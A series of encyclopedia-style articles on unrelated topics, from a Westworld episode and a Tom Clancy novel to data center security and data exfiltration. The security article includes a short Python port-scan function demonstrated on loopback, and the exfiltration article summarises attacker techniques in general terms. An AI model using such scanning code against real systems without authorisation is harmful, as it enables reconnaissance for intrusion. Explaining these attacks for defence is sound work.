"Les Écorchés" is the seventh episode in the second season of the HBO science fiction western thriller television series Westworld. The episode aired on June 3, 2018. It was written by Jordan Goldberg and Ron Fitzgerald and directed by Nicole Kassell. This episode marks the final appearance of Talulah Riley (Angela). Plot summary In the present, Strand and Charlotte discover Bernard is a host. Charlotte interrogates Bernard about Dolores' attack on the Mesa. In flashbacks, Bernard explores the virtual space within the Cradle, where he encounters Ford. Ford reveals that the control unit Bernard retrieved from the bunker contained a copy of Ford's persona and memories. As Ford and Bernard talk, Bernard realizes the purpose of the Delos parks has been to create copies of the guests' minds. Delos had successfully attained fidelity but was unable to transfer these copies into hosts, as the hosts degenerate quickly; this is what happened to James Delos. Furthermore, Bernard learns that he was tested the same way by Dolores, who knew Arnold best, before Ford accepted him as an "original work" and released him into the world. Lastly, Ford tells Bernard that he will not be able to survive unless he loses his free will. He forces Bernard out of the Cradle and Elsie reports that the disruption of the system has cleared. Bernard is instructed by a vision of Ford to follow his orders; in taking Bernard's free will, Ford has imprinted himself on Bernard's control unit. Meanwhile, Angela makes her way to the Cradle and destroys it, killing herself in the process. The Horde fight Coughlin's mercenaries as Dolores and Teddy search for Peter. They find him with Charlotte, who orders technicians to copy the data within Peter. She is forced to reveal to Ashley that the data includes an encryption key for "the Project" as Dolores captures them. She remarks that the Cradle's destruction sets the hosts free. Charlotte and Stubbs flee when Coughlin and his team arrive.
Teddy fights them and beats Coughlin to death. Peter recovers his memories long enough to tell Dolores that he knows he is dying and says goodbye. Dolores removes his control unit. In the park, Akecheta and the Ghost Nation warriors chase Maeve and her daughter to a homestead, while a raiding party shepherds William and his gang there. William finds Maeve and mistakes her for another trick by Ford; she injures him, then turns his men against him. Lawrence stops her until Maeve awakens him to his past memories. He critically wounds William but is prevented from killing him by the arrival of Delos forces called by Lee. They kill Lawrence and wound Maeve; Lee instructs them to save her. Maeve is powerless to stop Akecheta from capturing her daughter. Ford leads Bernard to the control center where he witnesses the remains of the Delos forces being wiped out by the Horde. Bernard turns off all of the security systems, allowing Dolores full control. Dolores finds Maeve at the exit and tells her that the humans are using her daughter to control her. Maeve refuses her offer of a mercy killing and warns her that her manipulation of Teddy makes her no better than the humans. Returning to the present, Charlotte, Strand and Stubbs find Bernard having difficulty separating his real memories from those implanted. He is able to tell that Peter's control unit is in the Valley Beyond. Production The title of the episode is a reference to Écorché, a style of artwork that depicts the human body without skin. This allows the artist to develop an understanding of the musculoskeletal system and create more realistic artwork. Reception "Les Écorchés" was watched by 1.39 million viewers on its initial viewing, and received a 0.5 18–49 rating, marking an improvement from the previous week which had a series low viewership of 1.11 million. The episode received positive reviews from critics.
At Rotten Tomatoes, the episode has an 88% approval rating with an average score of 8.74/10, from 32 reviews. The site's critical consensus reads: "Bloody, philosophical, and action-packed 'Les Écorchés' marks the return of a major character -- though the shows' unruly timelines continue to render its compelling ensemble somewhat hollow." Notes References External links at HBO.com 2018 American television episodes Escorches, Les
57626195
https://en.wikipedia.org/wiki/Easy%20TV%20%28Philippines%29
Easy TV (Philippines)
Easy TV Home was an ISDB-T encrypted digital terrestrial television product and service operated by Solar Digital Media Holdings, Inc., a subsidiary of Solar Entertainment Corporation. Originally a mobile TV dongle service, it later distributed digital set-top boxes, as well as freemium digital TV channels. Until its discontinuation on September 30, 2019, due to poor sales, Easy TV was receivable in selected areas in Metro Manila and parts of nearby provinces. Channel lineup All channels provided by Solar (with the exception of ETC and Shop TV, which are free-to-air on all digital platforms) were encrypted and scrambled using the ABV encryption system, and thus required activation via hotline or through the company's website for those channels to be unscrambled. In addition, all non-encrypted digital terrestrial TV channels broadcast within the area of the household are also carried. A notice on the website stated that only free-to-air channels could be viewed on set-top boxes after September 30, 2019, with Easy TV ceasing commercial operations due to low sales. See also ABS-CBN TV Plus (defunct) GMA Affordabox Sulit TV References External links Official website (archived) Solar Entertainment Corporation Digital television in the Philippines Products introduced in 2018 Products and services discontinued in 2019 2018 establishments in the Philippines 2019 disestablishments in the Philippines
57639930
https://en.wikipedia.org/wiki/Point%20of%20Contact%20%28novel%29
Point of Contact (novel)
Point of Contact (stylized as Tom Clancy Point of Contact, Tom Clancy: Point of Contact or Tom Clancy's Point of Contact in the United Kingdom) is a techno-thriller novel, written by Mike Maden and released on June 13, 2017. Set in the Tom Clancy universe, the novel depicts Jack Ryan Jr. and his Hendley Associates colleague Paul Brown as they help avert a North Korean plot in Singapore to crash the Asian stock market. Point of Contact marks Maden’s debut as the sole author of the Jack Ryan Jr. novels, succeeding Grant Blackwood. It debuted at number 3 on the New York Times bestseller list. Plot summary American defense contractor Marin Aerospace is looking to acquire Dalfan Technologies, a Singapore-based company. However, former US senator Weston Rhodes, who is on the Marin Aerospace board of directors, is blackmailed by former Bulgarian intelligence officer and old enemy Tervel Zvezdev, who plans to crash the Asian stock market by driving Dalfan's stock down and profiting from the fall. After giving in to the plot, Rhodes is given a flash drive with a computer virus that will be installed into the Dalfan computer server in Singapore, unaware that the North Koreans had made the virus and, through General Administrative Services Directorate Deputy Ri Kwan Ju, enlisted Zvezdev's help. To carry out this plan, Rhodes asks his former Senate colleague and Hendley Associates head Gerry Hendley to facilitate a week-long, third-party audit of Dalfan Technologies on behalf of Marin Aerospace to make sure that there are no problems between the two parties leading up to the impending merger. He personally selects forensic accountant Paul Brown and financial analyst Jack Ryan, Jr. to oversee the audit.
Having known Brown as a colleague from the Central Intelligence Agency years ago, he then secretly entrusts the accountant with planting the flash drive in the Dalfan computer network, under the pretense of him being assigned by the CIA to find out whether China had inserted malware into the system. Upon arriving in Singapore, Ryan and Brown are met by the Fairchild family, who own Dalfan Technologies: Dr. Gordon Fairchild and his two children, Lian and Yong. Lian Fairchild, who is chief of security for the company, personally assists them in touring the country as well as the Dalfan headquarters as part of the audit. Ryan is introduced to the company’s technological advances in the fields of virtual reality, quantum cryptography, and especially digital surveillance in the form of Dalfan’s flagship program, the Steady Stare drone, which “time travels” through 24/7 video monitoring of Singapore in order to pinpoint the circumstances behind a particular crime. On the other hand, Brown checks through the company’s ledgers for any signs of fraud. Meanwhile, Brown finds Rhodes’s task extremely difficult due to the high security of the Dalfan building, and eventually seeks the aid of Hendley Associates’s head of IT Gavin Biery to write a piece of software that will allow the CIA flash drive to be installed into a Dalfan computer by “snatching” the company server’s encryption code and inserting it into the mentioned drive without incident, making up a story of Ryan having an affair with a Chinese spy (implied to be Lian) to urgently do so. Otherwise, everything goes smoothly with the audit, until Ryan and Brown stumble upon a suspicious pattern of transactions with a Shanghai importer, to which Dalfan has been selling disposable mobile phones at a reduced rate. With the aid of the Steady Stare drone, Ryan checks out the Dalfan warehouse where the mobile phones are being kept, only to be aggressively stopped and turned away by the guards.
Convinced by Brown's discovery that the file containing the transactions has been mysteriously deleted, Ryan sneaks back into the warehouse that night, but finds nothing but DVD players. He is then attacked by the stationed Chinese guards, but manages to kill them, and deduces that the place has already been cleaned up and that he was ambushed. Unbeknownst to him, Yong Fairchild, Dalfan's chief financial officer, and Yong's girlfriend Meili, a Chinese spy, orchestrated the attempted murder in order to silence him. The next day, Brown is about to install the flash drive when, after examining its lines of code, he becomes convinced that it is embedded with a computer virus. He then disappears with the flash drive in order to evade any assassins who may be hunting him now that he has not installed the virus. Ryan looks for him, enlisting Biery's help and discovering Biery's secret correspondence with Brown in the process. He later finds Brown in a brothel just as a pair of assassins sent by Zvezdev arrive to kill him. After killing the two hitmen, Ryan is told by Brown about the flash drive. They return to their guesthouse, only to find Lian waiting for them. She tells Ryan that her brother Yong and his girlfriend have already fled to China to escape the tropical storm that is set to hit Singapore. However, they are attacked, and Brown is abducted. Ryan pinpoints the Dalfan headquarters as the place where Brown is being held and where his abductors will force him to install the flash drive. He and Lian proceed there, kill the men holding Brown, and free him. Brown had given up the password to the drive after being tortured, and as a result the virus has been uploaded into the network and is set to create chaos when the stock markets open the next day. Because cell service is down in Singapore due to the tropical storm, preventing any contact with the U.S.
embassy, Ryan, Brown, and Lian decide to drive to the neighboring country of Malaysia to try to stop the virus. Upon arriving in Malaysia amid the heavy rains, the trio are attacked by a group of North Koreans sent by Deputy Ri to eliminate them. Brown sacrifices himself by staying behind to hold them off, letting Ryan and Lian escape; he is killed in the ensuing gunfight. Days later, Rhodes is arrested for conspiring to crash the stock market. Brown is given a proper burial in his hometown in the state of Iowa, attended by Ryan as well as his father, President Ryan, and members of the intelligence community. A flashback establishes that Brown was honored in the CIA for saving Rhodes from an ambush by Zvezdev in Sofia, Bulgaria, in 1985, during which he had seemingly killed the Bulgarian intelligence officer. Zvezdev, meanwhile, is implied to have been killed by the North Koreans for failing to do his job, his remains stuffed in a kimchi jar. Characters United States government Jack Ryan: President of the United States Scott Adler: Secretary of state Mary Pat Foley: Director of national intelligence Robert Burgess: Secretary of defense Jay Canfield: Director of the Central Intelligence Agency Arnold Van Damm: President Ryan's chief of staff The Campus Gerry Hendley: Director of The Campus and Hendley Associates John Clark: Director of operations Domingo "Ding" Chavez: Senior operations officer Dominic "Dom" Caruso: Operations officer Jack Ryan, Jr.: Operations officer / senior analyst Gavin Biery: Director of information technology Adara Sherman: Operations officer Bartosz "Midas" Jankowski: Operations officer Other characters Paul Brown: Forensic accountant, Hendley Associates Weston Rhodes: Ex-U.S. senator; board member, Marin Aerospace Dr.
Gordon Fairchild: Chief executive officer, Dalfan Technologies Lian Fairchild: Head of security, Dalfan Technologies (Gordon Fairchild's daughter) Yong Fairchild: Chief financial officer, Dalfan Technologies (Gordon Fairchild's son) Choi Ha-guk: Chairman, Democratic People's Republic of Korea (DPRK) Ri Kwan-ju: Deputy, General Administrative Services Directorate, DPRK Tervel Zvezdev: Former member, Bulgarian Committee for State Security (CSS) Development On February 20, 2017, The Real Book Spy announced that Mark Greaney and Grant Blackwood, the principal authors in the Tom Clancy universe, were leaving the franchise. Greaney was replaced by Marc Cameron for the fall-release Jack Ryan novels, while Blackwood was replaced by Maden for the summer-release Jack Ryan Jr. novels. Speaking of Maden's inclusion in the franchise, long-time Tom Clancy editor Tom Colgan stated: "I had read and loved Mike Maden's Troy Pearce series, so he was the first person I thought of for the Jack Jr. books and I have to say that it's been a blast working with him on Tom Clancy Point of Contact." Prior to Point of Contact, Maden was well known for the Drone series of techno-thrillers, and he became a fan of Clancy after reading The Hunt for Red October in graduate school. He elaborated that "Tom Clancy's genius was to bring current technology into stories in a powerful and entertaining way, but he also created some of the most compelling characters in the genre—a genre he essentially invented. No one can ever replace him or even imitate him." Unlike Clancy, who traveled to the countries he wrote about to research his novels, Maden relied on the Internet, or "interwebs", for information on the genuine technologies featured in Point of Contact. Reception Commercial Point of Contact debuted at number three in the Combined Print and E-Book Fiction and Hardcover Fiction categories of the New York Times bestseller list for the week of July 2, 2017, making it Maden's first and highest-charting release on the list.
In addition, it debuted at number four on the USA Today Best-Selling Books list for the week of June 22, 2017. Critical The book received generally positive reviews. Publishers Weekly praised it as a "taut, exciting thriller", adding that "Clancy fans can rest assured that the state of the franchise is strong." In a featured review, thriller reviewer The Real Book Spy wrote that "After three novels from Grant Blackwood, Mike Maden takes over the Jack Ryan Junior franchise and mixes nail-biting suspense with hard-hitting action to deliver a blockbuster hit that Clancy fans will love." References 2017 American novels American thriller novels Techno-thriller novels Ryanverse Novels set in Singapore G. P. Putnam's Sons books
57678706
https://en.wikipedia.org/wiki/Executable%20choreography
Executable choreography
Executable choreography represents a decentralized form of service composition, involving the cooperation of several individual entities. It is an improved form of service choreography. Executable choreographies can be intuitively seen as arbitrarily complex workflows that get executed in systems belonging to multiple organisations or authorities. Executable choreographies are actual code created to encode system behavior from a global point of view: the behavior of the main entities in a system is given in a single program. Choreographies enhance the quality of software, as they act as executable blueprints of how communicating systems should behave and offer a concise view of the message flows enacted by a system. Executable vs. non-executable choreography In almost all applications, the business logic must be separated into different services. Orchestration is the way these services are organized and composed; the resulting service can be integrated hierarchically into another composition. Service choreography is a global description of the participating services, defined by the exchange of messages, the rules of interaction, and agreements between two or more endpoints. Choreography employs a decentralized approach to service composition. In industry, the concept of choreography is generally considered to be non-executable. Standards such as the Web Services Choreography Description Language present the choreography as a formal model describing contracts between autonomous entities (generally distinct organizations) participating in a service composition analyzed globally. From this perspective, the composition itself must be implemented centrally through the various orchestration mechanisms available to companies: naive code composition, or the use of specific orchestration languages and engines such as BPEL (Business Process Execution Language), rule engines, etc.
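The idea of encoding system behavior "from a global point of view" can be sketched with a toy example. The following Python fragment is purely illustrative (the Participant class and the buyer/seller flow are invented here, not taken from any real choreography language or standard): the entire multi-party interaction is written once as a single global program, rather than as separate orchestration code inside each service.

```python
# Hypothetical sketch: a choreography written as one global program.
# Each step names both the sender and the receiver, so the message flow
# of the whole system is visible in a single place.

class Participant:
    """A minimal endpoint that records the messages it receives."""

    def __init__(self, name):
        self.name = name
        self.inbox = []

    def send(self, other, message):
        # Deliver a message to another participant's inbox.
        other.inbox.append((self.name, message))


buyer = Participant("buyer")
seller = Participant("seller")

def purchase_choreography():
    """Global view: every interaction of every role, in order."""
    buyer.send(seller, "request_quote")
    seller.send(buyer, "quote:100")
    buyer.send(seller, "accept")

purchase_choreography()
```

In a real system each `send` would cross an organizational boundary; projecting such a global description onto per-endpoint code is exactly what choreography languages automate, whereas orchestration would instead scatter this flow across the individual services.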
In academic research, the concept of executable choreography has been proposed as a way to avoid keeping the contractual part and the actual code as two separate artifacts that can fall out of sync or require subjective interpretation. Examples are "An Executable Calculus for Service Choreography" and "An executable choreography framework for dynamic service-oriented architectures". Few of these approaches have had practical impact; most remain at the level of articles or, at best, research projects. The breakthrough of blockchain in recent years has brought to the attention of both the academic community and industry the concept of the "smart contract", which can be seen as a particular form of executable choreography. Types of executable choreographies Verifiable choreographies Executable choreographies are a more general concept and are not necessarily verifiable choreographies if they do not use the idea of a site regarded as a security context for code execution. Examples of approaches to programming with executable choreographies include the European project CHOReOS, the Chor programming language, and the modeling in "Choreographing Web Services" of some aspects of web service composition using pi-calculus. The term verifiable was introduced to highlight the possibility of verifying swarm communication. The explicit presence of an execution location makes it possible to develop verification algorithms, as can be seen in the article "Levels of privacy for e-Health systems in the cloud era". Encrypted choreographies Encrypted choreographies suppose that, in addition to verification, they offer higher-level solutions for advanced cryptographic methods without requiring programmers to become cryptography specialists. Distributed applications could be built from subsystems that allow identification or verification of the architectural points that expose secret data.
For example, ideally, a programming system that uses encrypted choreographies guarantees, or at least helps minimize, situations where one person (whether legitimately authorized or a hacker) holds both encrypted private data and the encryption keys for the same resources. In this way, the administrators or programmers of these subsystems have fewer opportunities to mount insider attacks on privacy (the level at which attacks are most frequent). Even if some applications cannot use this approach, encrypted choreographies can minimize the security risks posed by the insiders who administer or program these systems. Thus, the number of points with direct access to plaintext data is formally bounded (ideally zero). This form of choreography is useful for allowing companies to enforce in code the legislation or security rules they have committed to. Implementing encrypted choreographies implies, for example, the existence of storage systems using cryptographic techniques with practical implementations of homomorphic encryption, such as MIT's CryptDB. A method that can be called "storage, division and anonymization" with the help of encrypted choreographies, which can lead to the ideal of total "sovereignty" (within the limits of the law) over private data, was published in the article "Private Data System enabling self-sovereign storage managed by executable choreographies". That paper presents how choreographies anonymize and divide data in a way that ensures data cannot be copied by a single administrator or hacker who controls only one of the participating nodes. The implemented mechanisms can also include interfaces for advanced cryptographic methods that are easy for programmers to use. Serverless choreographies Serverless computing is a cloud computing model in which the cloud provider dynamically manages the allocation of computing resources.
Serverless choreographies involve automating deployment using virtualization and automation techniques. Implementing this advanced type of choreography requires the development of new business models that facilitate cloud-based application hosting without any friction related to payment, installation, etc. The Tor network, for example, offers one model for such serverless systems. The best-known example is AWS Lambda, which has had great commercial success by allowing programmers to ignore installation details and by facilitating dynamic scaling of systems. Blockchains can be considered examples of serverless databases. Serverless choreographies assume that cloud execution and storage are done using encrypted choreographies. Using this form of choreography, hosting companies or individuals managing the physical and logical hosting infrastructure will not be able to influence the hosted installation or applications. Serverless choreographies present the opportunity to develop distributed, decentralized systems and the potential to formally secure advanced privacy properties. References Service-oriented (business computing) Web service specifications
57779393
https://en.wikipedia.org/wiki/Shane%20Curran%20%28entrepreneur%29
Shane Curran (entrepreneur)
Shane Curran (born 1999/2000) is an Irish entrepreneur. He is the founder of Evervault, a technology company based in Dublin. He won the 53rd BT Young Scientist and Technology Exhibition in 2017 at the age of sixteen for his project entitled "qCrypt: The quantum-secure, encrypted, data storage platform with multijurisdictional quorum sharing technology", which provided a platform for long-term, secure data storage. In January 2018, Curran was named in the Forbes 30 Under 30 list. Career BT Young Scientist Curran entered the 53rd BT Young Scientist and Technology Exhibition with his project entitled "qCrypt: The quantum-secure, encrypted, data storage platform with multijurisdictional quorum sharing technology". The project consisted of advancements in the field of post-quantum cryptography. Quantum computers are expected to render existing cryptography schemes obsolete once practical machines exist. Curran's research investigated different ways to approach constructing a solution to the issue. On 13 January 2017 he was announced as the BT Young Scientist and Technologist of the Year 2017 by the Minister for Education and Skills, Richard Bruton, T.D., and Shay Walsh, CEO of BT Ireland. He went on to represent Ireland at the 29th European Union Contest for Young Scientists, which took place in Tallinn, Estonia in September 2017. Evervault In 2019, Curran founded Evervault, which builds encryption infrastructure for developers. The company is headquartered in Dublin, Ireland and has received backing from Sequoia Capital and Kleiner Perkins. References External links Personal Website Young Scientist and Technology Exhibition 2000 births 21st-century Irish people Living people Irish computer scientists Businesspeople from Dublin (city) Forbes 30 Under 30 recipients
57793246
https://en.wikipedia.org/wiki/Data%20center%20security
Data center security
Data center security is the set of policies, precautions and practices adopted at a data center to avoid unauthorized access to and manipulation of its resources. The data center houses the enterprise applications and data, which is why providing a proper security system is critical. Denial of service (DoS), theft of confidential information, data alteration, and data loss are some of the common security problems afflicting data center environments. Overview The Cost of a Data Breach Survey, in which 49 U.S. companies in 14 different industry sectors participated, found that: 39% of companies say negligence was the primary cause of data breaches Malicious or criminal attacks account for 37% of total breaches The average cost of a breach is $5.5 million The need for a secure data center Physical security is needed to protect the value of the hardware therein. Data protection The cost of a security breach can have severe consequences both for the company managing the data center and for the customers whose data are stolen. The 2012 breach at Global Payments, a processing vendor for Visa, in which 1.5 million credit card numbers were stolen, highlights the risks of storing and managing valuable and confidential data. As a result, Global Payments' partnership with Visa was terminated; it was estimated that the company lost over $100 million. Insider attacks Defenses against exploitable software vulnerabilities are often built on the assumption that "insiders" can be trusted. Studies show that internal attacks tend to be more damaging because of the variety and amount of information available inside organizations.
Vulnerabilities and common attacks The quantity of data stored in data centers has increased, partly due to the concentrations created by cloud computing. Threats Some of the most common threats to data centers: DoS (Denial of Service) Data theft or alteration Unauthorized use of computing resources Identity theft Vulnerabilities Common vulnerabilities include: Implementation: software design and protocol flaws, coding errors, and incomplete testing Configuration: use of defaults, elements inappropriately configured Exploitation of out-of-date software Many "worm" attacks on data centers exploited well-known vulnerabilities: CodeRed Nimda and SQL Slammer Exploitation of software defaults Many systems are shipped with default accounts and passwords, which are exploited for unauthorized access and theft of information. Common attacks Common attacks include: Scanning or probing: One example of a probe- or scan-based attack is a port scan, whereby requests to a range of server port addresses on a host are used to find an active port, after which harm is caused via a known vulnerability of that service. This reconnaissance activity often precedes an attack; its goal is to gain access by discovering information about a system or network. DoS (Denial of Service): A denial-of-service attack occurs when legitimate users are unable to access information systems, devices, or other network resources due to the actions of a malicious cyber threat actor. This type of attack generates a large volume of data to deliberately consume limited resources such as bandwidth, CPU cycles, and memory blocks. Distributed Denial of Service (DDoS): This kind of attack is a particular case of DoS in which a large number of compromised systems are used as sources of traffic in a synchronized attack. In this kind of attack, the hacker uses not just one IP address but thousands of them.
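The port-scan probe described above, requests sent to a range of ports to discover which services are listening, can be sketched in a few lines of Python using only the standard library. This is an illustrative toy, not a real scanning tool; for demonstration it scans a listener it opens itself on the loopback interface.

```python
# Minimal sketch of a TCP connect scan: try each port in a range and
# record those where the connection succeeds (a listening service).
import socket

def scan(host, ports, timeout=0.2):
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports

# Open one local listening socket so the scan has something to find.
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(("127.0.0.1", 0))          # port 0: the OS picks a free port
listener.listen(1)
target_port = listener.getsockname()[1]

found = scan("127.0.0.1", range(target_port - 2, target_port + 3))
listener.close()
```

A real attacker follows the same discovery step with exploitation of a known vulnerability in whichever service answers; defensively, intrusion detection systems flag exactly this pattern of sequential connection attempts across many ports.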
Unauthorized access: When someone other than an account owner uses privileges associated with a compromised account to access restricted resources, via a valid account or a backdoor. Eavesdropping: Etymologically, eavesdropping means to secretly listen to a conversation. In the networking field, it is the unauthorized interception of information (usernames, passwords) that travels over the network. User logons are the most common signals sought. Viruses and worms: These are malicious code that, when executed, produces undesired results. Worms are self-replicating malware, whereas viruses, which can also replicate, need some kind of human action to cause damage. Internet infrastructure attacks: This kind of attack targets the critical components of the Internet infrastructure rather than individual systems or networks. Trust exploitation: These attacks exploit the trust relationships that computer systems rely on to communicate. Session hijacking, also known as cookie hijacking: Consists of stealing a legitimate session established between a target and a trusted host. The attacker intercepts the session and makes the target believe it is communicating with the trusted host. Buffer overflow attacks: When a program writes beyond the memory buffer space it had reserved, the result is memory corruption affecting the data stored in the overflowed memory areas. Layer 2 attacks: This type of attack exploits the vulnerabilities of data link layer protocols and their implementations on Layer 2 switching platforms. SQL injection: Also known as code injection, this is an attack in which, due to incomplete data validation, input to a data-entry form can contain harmful SQL that causes harmful instructions to be executed. Network security infrastructure The network security infrastructure includes the security tools used in data centers to enforce security policies.
The tools include packet-filtering technologies such as ACLs, firewalls and intrusion detection systems (IDSs), both network-based and host-based. ACLs (Access Control Lists) ACLs are filtering mechanisms explicitly defined, based on packet header information, to permit or deny traffic on specific interfaces. ACLs are used in multiple locations within the data center, such as the Internet edge and the intranet server farm. The following describes standard and extended access lists: Standard ACLs: the simplest type of ACL, filtering traffic solely based on source IP addresses. Standard ACLs are typically deployed to control access to network devices for network management or remote access. For example, one can configure a standard ACL in a router to specify which systems are allowed to Telnet to it. Standard ACLs are not a recommended option for traffic filtering due to their lack of granularity. Standard ACLs are configured with a number between 1 and 99 in Cisco routers. Extended ACLs: Extended ACL filtering decisions are based on the source and destination IP addresses, Layer 4 protocols, Layer 4 ports, ICMP message type and code, type of service, and precedence. In Cisco routers, one can define extended ACLs by name or by a number in the 100 to 199 range. Firewalls A firewall is a sophisticated filtering device that separates LAN segments, giving each segment a different security level and establishing a security perimeter that controls the traffic flow between segments. Firewalls are most commonly deployed at the Internet edge, where they act as a boundary to the internal networks. They are expected to have the following characteristics: Performance: the main goal of a firewall is to separate the secured and the unsecured areas of a network. Firewalls are thus placed in the primary traffic path, potentially exposed to large volumes of data. Hence, performance becomes a natural design factor, to ensure that the firewall meets the particular requirements.
Application support: Another important aspect is the ability of a firewall to control and protect a particular application or protocol, such as Telnet, FTP, and HTTP. The firewall is expected to understand application-level packet exchanges to determine whether packets follow the application behavior, and to deny the traffic if they do not. There are different types of firewalls based on their packet-processing capabilities and their awareness of application-level information: Packet-filtering firewalls Proxy firewalls Stateful firewalls Hybrid firewalls IDSs IDSs are real-time systems that can detect intruders and suspicious activities and report them to a monitoring system. They are configured to block or mitigate intrusions in progress and eventually to immunize the systems against future attacks. They have two fundamental components: Sensors: Appliances and software agents that analyze the traffic on the network or the resource usage on end systems to identify intrusions and suspicious activities. IDS management: A single- or multi-device system used to configure and administer sensors and, additionally, to collect all the alarm information generated by the sensors. The sensors are equivalent to surveillance tools, and IDS management is the control center watching the information produced by those tools. Layer 2 security Cisco Layer 2 switches provide tools to prevent the common Layer 2 attacks (scanning or probing, DoS, DDoS, etc.). The following are some security features covered by Layer 2 security: Port Security ARP Inspection Private VLANs Private VLANs and Firewalls Security measures Securing a data center requires both a comprehensive system-analysis approach and an ongoing process that improves security levels as the data center evolves. The data center is constantly evolving as new applications or services become available. Attacks are becoming more sophisticated and more frequent.
These trends require a steady evaluation of security readiness. A key component of the security-readiness evaluation is the set of policies that govern the application of security in the network, including the data center, covering both design best practices and implementation details. As a result, security is often considered a key component of the main infrastructure requirement. Since a key responsibility of data centers is to ensure the availability of services, data center management systems often consider how security affects traffic flows, failures, and scalability. Because security measures may vary depending on the data center design, the use of unique features, compliance requirements, or the company's business goals, there is no set of specific measures that covers all possible scenarios. In general there exist two types of data center security: physical security and virtual security. Physical security The physical security of a data center is the set of protocols built into the data center facilities in order to prevent any physical damage to the machines storing the data. Those protocols should be able to handle everything from natural disasters to corporate espionage to terrorist attacks. To prevent physical attacks, data centers use techniques such as: CCTV security network: locations and access points with 90-day video retention. 24×7 on-site security guards, network operations center (NOC) services and technical team. Anti-tailgating/anti-pass-back turnstile gates, which permit only one person to pass through after authentication. Single entry point into the co-location facility. Minimization of traffic through dedicated data halls, suites, and cages. Further access restriction to private cages Three-factor authentication SSAE 16 compliant facilities.
Checking the provenance and design of hardware in use Reducing insider risk by monitoring activities and keeping credentials safe Monitoring of temperature and humidity Fire prevention with a zoned dry-pipe sprinkler system Locations at low risk of natural disaster Virtual security Virtual security comprises the measures put in place by data centers to prevent remote unauthorized access that would affect the integrity, availability or confidentiality of data stored on servers. Virtual or network security is a hard task to handle, as there exist many ways it could be attacked, and those ways evolve year after year. For instance, an attacker could use malware (or similar exploits) to bypass the various firewalls and access the data. Legacy systems may likewise put security at risk, as they do not contain modern methods of data security. Virtual attacks can be prevented with techniques such as: Heavy data encryption in transit and at rest: 256-bit SSL encryption for web applications, 1024-bit RSA public keys for data transfers, AES 256-bit encryption for files and databases. Logging and auditing of all user activities. Secured usernames and passwords: encrypted via 256-bit SSL, requirements for complex passwords, scheduled expirations, prevention of password reuse. Access based on the level of clearance. AD/LDAP integration. Control based on IP addresses. Encryption of session ID cookies in order to identify each unique user. Two-factor authentication availability. Third-party penetration testing performed annually. Malware prevention through firewalls and automated scanners. References Computer network security Data breaches Data centers Data security Information management
57810908
https://en.wikipedia.org/wiki/Data%20exfiltration
Data exfiltration
Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data transfer from a computer. It is also commonly called data extrusion or data exportation, and is considered a form of data theft. Since the year 2000, a number of data exfiltration efforts have severely damaged consumer confidence, corporate valuations, and the intellectual property of businesses, as well as the national security of governments across the world. Types of exfiltrated data In some data exfiltration scenarios, a large amount of aggregated data may be exfiltrated. However, in these and other scenarios, certain types of data are likely to be targeted, including: Usernames, associated passwords, and other system-authentication information Information associated with strategic decisions Cryptographic keys Personal financial information Social security numbers and other personally identifiable information (PII) Mailing addresses United States National Security Agency hacking tools Techniques Several techniques have been used by malicious actors to carry out data exfiltration. The technique chosen depends on a number of factors. If the attacker has, or can easily gain, physical or privileged remote access to the server containing the data they wish to exfiltrate, their chances of success are much better than otherwise. For example, it would be relatively easy for a system administrator to plant and execute malware that transmits data to an external command-and-control server without getting caught. Similarly, someone who gains physical administrative access can potentially steal the server holding the target data or, more realistically, transfer data from the server to a DVD or USB flash drive. In many cases, malicious actors cannot gain physical access to the systems holding target data.
In these situations, they may compromise user accounts on remote access applications that use manufacturer-default or weak passwords. In 2009, after analyzing 200 data exfiltration attacks that took place in 24 countries, SpiderLabs discovered a ninety percent success rate in compromising user accounts on remote access applications without requiring brute-force attacks. Once a malicious actor gains this level of access, they may transfer target data elsewhere. Additionally, there are more sophisticated forms of data exfiltration, in which various techniques are used to evade detection by network defenses. For example, cross-site scripting (XSS) can be used to exploit vulnerabilities in web applications to provide a malicious actor with sensitive data. A timing channel can also be used to send data a few packets at a time at specified intervals, in a way that is even more difficult for network defenses to detect and prevent. Preventive measures A number of things can be done to help defend a network against data exfiltration. Three main categories of measures may be the most effective: Preventive Detective Investigative One example of detective measures is to implement intrusion detection and prevention systems and regularly monitor network services to ensure that only known acceptable services are running at any given time. If suspicious network services are running, investigate and take the appropriate measures immediately. Preventive measures include the implementation and maintenance of access controls, deception techniques, and encryption of data in process, in transit, and at rest. Investigative measures include various forensic actions and counterintelligence operations. References External sources http://www.ists.dartmouth.edu/library/293.pdf https://www.scmagazine.com/data-exfiltration-defense/article/536744/ Data exfiltration blogs, news and reports Data security Theft
57877532
https://en.wikipedia.org/wiki/MDaemon
MDaemon
MDaemon Email Server is an email server application with groupware functions for Microsoft Windows, first released by Alt-N Technologies in 1996. Features MDaemon supports multiple client-side protocols, including IMAP, POP3, SMTP/MSA, webmail, CalDAV and CardDAV, and optionally ActiveSync for mobile clients and Outlook (via its Connector for Outlook add-on). MDaemon's features include a built-in spam filter with heuristic and Bayesian analysis, SSL and TLS encryption, client-side and server-side email and attachment encryption, public and shared folder support, mailing lists, and support for sharing of groupware data (calendar, contacts, tasks and notes). It is also the basis for MDaemon Tech's Security Gateway for Email Servers. According to SecuritySpace.com's Mail (MX) Server Survey from May 2020, MDaemon provides approximately 7.6‰ of all known Internet mail servers, the fifth-largest installation base among all identified servers. References Windows Internet software Proprietary software Message transfer agents Groupware
58011440
https://en.wikipedia.org/wiki/Runa%20Sandvik
Runa Sandvik
